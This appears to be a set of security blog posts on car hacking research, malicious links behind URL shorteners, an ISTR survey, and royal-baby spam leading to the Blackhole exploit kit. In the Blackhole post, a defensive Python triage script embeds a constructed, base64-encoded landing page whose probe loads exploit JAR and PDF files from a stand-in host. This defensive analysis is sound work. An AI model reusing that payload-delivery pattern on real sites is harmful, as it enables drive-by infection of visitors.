When Car Hacking Turns Your Vehicle into a Video Game


Modern cars contain a lot of nifty electronic gadgets, as well as more than one kilometer of cable wired to all kinds of sensors, processing units, and electronic control units. The cars themselves have become large computers, and as history shows, wherever there is a computer, there is someone trying to attack it. Over the past few years various studies have been conducted on how feasible it would be to attack a car through its onboard network. Most researchers focused on attacks with full physical access to the car, but some also explored external attack vectors.

If attackers have physical access to a car they can, for example, plug into the Controller Area Network (CAN) bus or the On-Board Diagnostics (OBD) port, but they can also do more direct damage, such as physically tampering with the brakes or stealing the car. Digital tampering, on the other hand, may be much harder to prove after an accident. Such attacks could also be combined with other attacks that allow remote code execution, and the CAN-bus work should therefore be read as a demonstration of what a payload can do once an attacker is on the vehicle network.

There are a few ways into a car's systems without physical access, for example through the tire pressure monitoring system, Traffic Message Channel (TMC) radio data, or GSM and Bluetooth connections. Some manufacturers have started shipping smartphone apps that control some of the car's functions, which opens another attack vector. There have also been cases where specially crafted music files on USB drives were able to hijack some of the car's systems.

Charlie Miller and Chris Valasek, two researchers working on a DARPA-funded project, explored how far they could go by hacking the Controller Area Network once inside the car. The pre-released video of their presentation for the upcoming DEFCON conference shows that nearly all of the car's functions can be controlled or triggered, including switching off all lights, shutting down the engine, disabling the brakes, some limited steering, sounding the horn, and manipulating the dashboard display. It doesn't take much imagination to see that this could cause serious accidents. Some of these changes could be made permanent and invisible with malicious firmware updates or system changes. Of course, a laptop with a modem in the glove box would work as well, but would not be as stealthy. If an attacker used the same method as the researchers, hopefully you would notice the laptop on your back seat and wonder what was going on.

Car manufacturers are aware of these challenges and have been working on improving the security of car networks for years. Remote attack vectors, especially, need to be analyzed and protected against. At Symantec we are also monitoring this research field to help improve it in the future. Miller and Valasek’s research shows that cars can be an interesting target for attackers, but there are currently far bigger automobile-related risks than hackers taking over your car while driving. Personally, I’m more scared of people texting messages while driving and I assume they pose a far bigger risk than hackers when it comes to accidents, for now at least. Safe driving.

Short-URL Services May Hide Threats

In a recent post, AppAppeal ranked the most popular URL shorteners. The top five includes TinyURL, Goo.gl, Bit.ly, Ow.ly and is.gd. Unfortunately, these helpful services are also used to hide a large number of malicious URLs. This result has made me want to learn more about malicious links that may be hidden behind these shortcuts.

For the top five, the following table and graphs show the number of malicious URLs McAfee Labs discovered in 2012 and the first half of 2013.

[Table and graphs: number of malicious URLs found behind each of the top five shorteners in 2012 and the first half of 2013; not reproduced here.]

In addition to the most commonly used URL shortening services, there are many others. Browsing the Internet, I soon discovered hundreds more.

The most common top-level domains for URL shorteners are COM, ME, LY, US, IN, NET, TO, IT, CC, and GD. But two-thirds of these sites are unreachable or lead you to web pages with advertising links indicating the domain name is for sale. Some others explain they had to close due to the amount of malicious URLs they hosted without being able to properly eliminate them.


The final third is harder to examine. Some require registration before they can be used, but most are still directly usable. Here are the shortening domains most abused to hide malware in 2013, according to our research.

  • bit.ly
  • tinyurl.com
  • goo.gl
  • is.gd
  • adf.ly
  • y.ahoo.it
  • ow.ly
  • jmb.tw
  • 0845.com
  • tiny.cc

 

To protect Internet users, in 2010 McAfee introduced its own secure URL shortener on the mcaf.ee domain. The service was designed to give the web community peace of mind: any link it refers to has been checked, contains no malware, and does not point to a malicious site.

If you follow any mcaf.ee short URL, such as this one leading to the French CLUSIF association web page (hxxp://mcaf.ee/4yr1s), you will notice that a frame is added to the top of the destination page confirming its good rating from McAfee SiteAdvisor. Here the check mark is green:

[Screenshot: mcaf.ee frame with a green SiteAdvisor check mark above the destination page; not reproduced here.]

But if you are redirected to a malicious URL, you will be stopped before it is too late.

[Screenshot: mcaf.ee block page shown instead of a malicious destination; not reproduced here.]

To create these short URLs, you can find add-ons at the Google Chrome Extension repository and at the Firefox add-on site. You may use these facilities knowing that McAfee will help keep you safe.
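The check a shortener such as mcaf.ee performs can also be reproduced on the client side before anyone clicks: expand the short link one redirect at a time without rendering the destination, refuse chains that loop or pass through too many shorteners, and compare every host on the way against a reputation list. The Python below is an added example written for this article, not McAfee's code. The shortener hosts are the ones listed above; the blocklist, the redirect table and all example hostnames are constructed for the illustration, and the reputation lookup is a stand-in for a service such as SiteAdvisor.

```python
"""Expand a short URL one redirect at a time and decide whether it is safe
to hand to a user.  Added example, not McAfee's mcaf.ee implementation.
The shortener hosts are the ones named in this article; BLOCKED_HOSTS and
the FAKE_REDIRECTS table are constructed for the example."""
import urllib.error
import urllib.request
from typing import Callable, Optional
from urllib.parse import urljoin, urlsplit

# Shortener domains listed in this article (plus mcaf.ee).
SHORTENER_HOSTS = {
    "bit.ly", "tinyurl.com", "goo.gl", "is.gd", "adf.ly", "y.ahoo.it",
    "ow.ly", "jmb.tw", "0845.com", "tiny.cc", "mcaf.ee",
}
# Constructed stand-in for a reputation service such as SiteAdvisor.
BLOCKED_HOSTS = {"malicious.example"}
MAX_HOPS = 5

# A fetcher returns the Location header a URL answers with, or None when
# the response is not a redirect.  Injecting it keeps the logic testable offline.
Fetcher = Callable[[str], Optional[str]]


def host_of(url: str) -> str:
    return (urlsplit(url).hostname or "").lower()


def expand(url: str, fetch: Fetcher, max_hops: int = MAX_HOPS) -> dict:
    """Follow redirects hop by hop; never render the destination.

    verdict is one of:
      'ok'        the chain terminated and no host on it is blocked
      'blocked'   a host in the chain is on the blocklist
      'loop'      the chain revisits a URL
      'too_long'  still redirecting after max_hops (nested shorteners)
    shortener_hops counts how many URLs in the chain sit on a known shortener.
    """
    chain = [url]
    current = url
    verdict = "too_long"
    for _ in range(max_hops):
        if host_of(current) in BLOCKED_HOSTS:
            verdict = "blocked"
            break
        nxt = fetch(current)
        if nxt is None:
            verdict = "ok"
            break
        nxt = urljoin(current, nxt)  # Location may be relative
        chain.append(nxt)
        if nxt in chain[:-1]:
            verdict = "loop"
            break
        current = nxt
    else:
        # Ran out of hops; the last URL was never fetched, but still screen it.
        if host_of(current) in BLOCKED_HOSTS:
            verdict = "blocked"
    return {
        "chain": chain,
        "verdict": verdict,
        "shortener_hops": sum(host_of(u) in SHORTENER_HOSTS for u in chain),
    }


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Make urllib surface 3xx responses instead of silently following them."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def live_fetch(url: str) -> Optional[str]:
    """Network fetcher: one HEAD request per hop, redirects not followed."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, method="HEAD")
    try:
        with opener.open(req, timeout=10):
            return None  # 2xx: this is the final destination
    except urllib.error.HTTPError as err:
        if err.code in (301, 302, 303, 307, 308):
            return err.headers.get("Location")
        raise


# Constructed redirect table standing in for the shorteners' real answers.
FAKE_REDIRECTS = {
    "http://bit.ly/abc": "http://tinyurl.com/def",
    "http://tinyurl.com/def": "http://malicious.example/x/index.html",
    "http://is.gd/loop1": "http://is.gd/loop2",
    "http://is.gd/loop2": "http://is.gd/loop1",
    "http://goo.gl/fine": "https://clusif.example/",
}
for _i in range(1, 8):  # a run of nested ow.ly hops longer than MAX_HOPS
    FAKE_REDIRECTS[f"http://ow.ly/{_i}"] = f"http://ow.ly/{_i + 1}"


def fake_fetch(url: str) -> Optional[str]:
    return FAKE_REDIRECTS.get(url)


if __name__ == "__main__":
    for start in ("http://bit.ly/abc", "http://is.gd/loop1",
                  "http://goo.gl/fine", "http://ow.ly/1"):
        result = expand(start, fake_fetch)
        print(f"{result['verdict']:9} {' -> '.join(result['chain'])}")
```

Swap `fake_fetch` for `live_fetch` to run it against real links. One caveat a practitioner will hit: some shorteners (adf.ly, for instance) redirect with JavaScript or a meta refresh rather than an HTTP 3xx, so a HEAD-only fetcher reports the chain as terminated at the shortener; a production checker has to fetch the body and parse those redirect forms as well, still without executing the page.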

Internet Security Threat Report Readership Survey

Symantec’s Internet Security Threat Report (ISTR) is an annual report which provides an overview and in-depth analysis of the online security landscape over the previous year. The report is based on data from Symantec’s Global Intelligence Network, which Symantec analysts use to identify, analyze, and provide commentary on emerging trends in cyberattacks, malicious code activity, phishing, and spam as well as the wider threat landscape trends in general.

The latest release, ISTR volume 18, may be considered the most comprehensive and detailed to date. Among other findings, the report incorporated up-to-date data and analysis on targeted attacks, data breaches, malware, spam, vulnerabilities, and mobile malware.

Everyone in Symantec is extremely proud of the ISTR; however, this is no time to rest on our laurels. We are constantly looking to improve the quality of our products and services, and that includes the ISTR. To that end, we would like to enlist the help of our readers with the first ever ISTR readership survey. By engaging with the ISTR readership, we hope to better tailor future reports to suit your needs and wants.

For example, would you like to see more in the report on data breaches? Perhaps you want to see an even wider focus on targeted attacks? Now is your chance to tell us your preferences, which parts you enjoy, and which parts you may want to skip over. While we will always endeavor to provide you with the best information about the most pertinent threats, we want to know what this means to our individual readers and the businesses they may represent in order to better understand how the report is being used.

We also want to find out whether you would prefer to receive more frequent ISTR-style reports in addition to the annual publication. Now is your chance to share your thoughts on all things ISTR—as the saying goes, help us to help you.

You can be heard by completing our ISTR user survey. It is quick and easy to complete, and your contributions are invaluable to us as we strive to improve the quality of our output. We would also encourage you, if you can, to share the survey with as many of your ISTR reading friends or colleagues as possible.

Thanks for reading and for helping out. We look forward to collecting your responses and making the ISTR a more responsive, tailored, and user friendly report, and we hope that you will continue to enjoy reading the report well into the future.

Take the survey

The Dangers of a Royal Baby: Scams Abound

Big news stories are always an opportunity for scammers and spammers, who attempt to redirect users to malicious exploit kits or other unwanted services. Britain’s royal baby is the latest news to offer cover for malware. We have already found a lot of spam messages regarding the birth and baby that lead users to the infamous Blackhole exploit kit.

The initial infection arrives as spam mail (Figure 1) that contains a redirection URL in the following format:

  • hxxp://[infectedDomain]/[Random]/index.html

Figure 1: Spam email (screenshot not reproduced here).

From there the user will land on a page with links to JavaScript files as in the next image:


Figure 2: Spam URL.

The first level contains the three *.js URLs that point to other infected/malicious domains. Once victims land on this page, the JavaScript files will lead them to a page like the following:


Figure 3: Blackhole landing page redirector.

The second-level URL shows us the actual landing page of the Blackhole exploit kit, which leads us to this content:


Figure 4: Customized encoded Blackhole landing page.

Decoding the customized base64-encoded Blackhole landing page yields a "plug-in detect" JavaScript. This is the PluginDetect library, a legitimate open-source script that Blackhole repurposes to enumerate the plug-ins installed in the victim's browser and their exact versions, so that the kit can serve only the exploit that matches a vulnerable version instead of firing everything it has. The next image shows the decoded PluginDetect.js:


Figure 5: Decoded Blackhole landing page (PluginDetect.js with malicious URL).

The following browser plug-ins are known to be targeted by the exploit kit:

  • Java Runtime Environment
  • Adobe PDF Reader
  • Flash

McAfee detects this PluginDetect.js stage as JS/Exploit!JNLP.d.

The following images show the Java and PDF components fetching the URL embedded in PluginDetect.js:


Figure 6: JAR file downloading the URL in PluginDetect.js.


Figure 7: PDF file downloading the URL in PluginDetect.js.
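The chain described above (a first-stage page pulling in three script includes, a base64-encoded landing page, a PluginDetect probe, and per-plug-in payload URLs) can be triaged offline without executing any of the JavaScript. The Python below is an added example written for this article, not McAfee's analysis tooling. The two pages, every hostname and the base64 blob are constructed stand-ins for the screenshots; the `decode()` wrapper in the sample landing page is invented, and the probe names (`getVersion("Java")` and so on) follow PluginDetect's public API.

```python
"""Triage a Blackhole-style redirection chain offline: list the script
sources a first-stage page pulls in, find and decode base64 blobs in the
landing page, and report which plug-ins the decoded code probes and which
URLs it would hand to them.  Added example for this article, not McAfee's
analysis tooling; the two pages and every hostname are constructed."""
import base64
import binascii
import re

SCRIPT_SRC = re.compile(r'<script[^>]+src=["\']([^"\']+)["\']', re.I)
B64_BLOB = re.compile(r'[A-Za-z0-9+/]{40,}={0,2}')
URL = re.compile(r'https?://[^\s"\'<>()]+')
# PluginDetect exposes getVersion(name); these are the plug-ins the article
# lists as targeted by the kit.
PLUGIN_PROBES = {
    "Java Runtime Environment": re.compile(r'getVersion\(\s*["\']Java["\']'),
    "Adobe PDF Reader": re.compile(r'getVersion\(\s*["\']AdobeReader["\']'),
    "Flash": re.compile(r'getVersion\(\s*["\']Flash["\']'),
}


def defang(url: str) -> str:
    """Make a URL unclickable in reports (the hxxp convention used above)."""
    return re.sub(r'^http', 'hxxp', url)


def script_sources(html: str) -> list:
    """External script URLs a page would load: the first-level *.js hosts."""
    return SCRIPT_SRC.findall(html)


def decode_blobs(html: str) -> list:
    """Decode every base64 run that yields readable text; skip the rest."""
    decoded = []
    for blob in B64_BLOB.findall(html):
        try:
            text = base64.b64decode(blob, validate=True).decode("ascii")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
        if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            decoded.append(text)
    return decoded


def triage(stage1_html: str, stage2_html: str) -> dict:
    """Static report over the chain: script hosts, probed plug-ins, payload URLs."""
    report = {"stage1_scripts": [defang(u) for u in script_sources(stage1_html)],
              "probed_plugins": [], "payload_urls": []}
    for text in decode_blobs(stage2_html):
        for name, probe in PLUGIN_PROBES.items():
            if probe.search(text) and name not in report["probed_plugins"]:
                report["probed_plugins"].append(name)
        for url in URL.findall(text):
            if defang(url) not in report["payload_urls"]:
                report["payload_urls"].append(defang(url))
    return report


# Constructed first-stage page: index.html with three script includes, the
# shape described for the spam landing page.
STAGE1_HTML = """<html><body><h1>Royal baby gift</h1>
<script type="text/javascript" src="http://js1.example/stat.js"></script>
<script type="text/javascript" src="http://js2.example/stat.js"></script>
<script type="text/javascript" src="http://js3.example/stat.js"></script>
</body></html>"""

# Constructed PluginDetect-style probe in the clear ...
_PROBE = """var pd = PluginDetect;
var jv = pd.getVersion("Java"), av = pd.getVersion("AdobeReader"), fv = pd.getVersion("Flash");
if (jv) document.write('<applet archive="http://landing.example/load.php?f=jar"></applet>');
if (av) document.write('<iframe src="http://landing.example/load.php?f=pdf"></iframe>');
"""
# ... and the constructed landing page that ships it base64-encoded
# (the decode() wrapper is invented for the example).
STAGE2_HTML = ('<html><body><script>eval(decode("'
               + base64.b64encode(_PROBE.encode()).decode()
               + '"))</script></body></html>')

if __name__ == "__main__":
    for key, values in triage(STAGE1_HTML, STAGE2_HTML).items():
        print(key, values)
```

The point of the regex-only approach is that nothing from the chain is ever evaluated, so it is safe to run on a live sample. It is also deliberately coarse: where a landing page uses a kit-specific string encoding instead of plain base64, `decode_blobs` is the step to replace, and URLs that are assembled at runtime from fragments will not appear in `payload_urls` until that decoding is done.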

This redirection chain could leave victims infected with one of these malware families:

For more detail about the Blackhole exploit kit, please refer to the McAfee Threat Advisory Library.

Thanks to my colleague Rohan Shah for his assistance with this blog.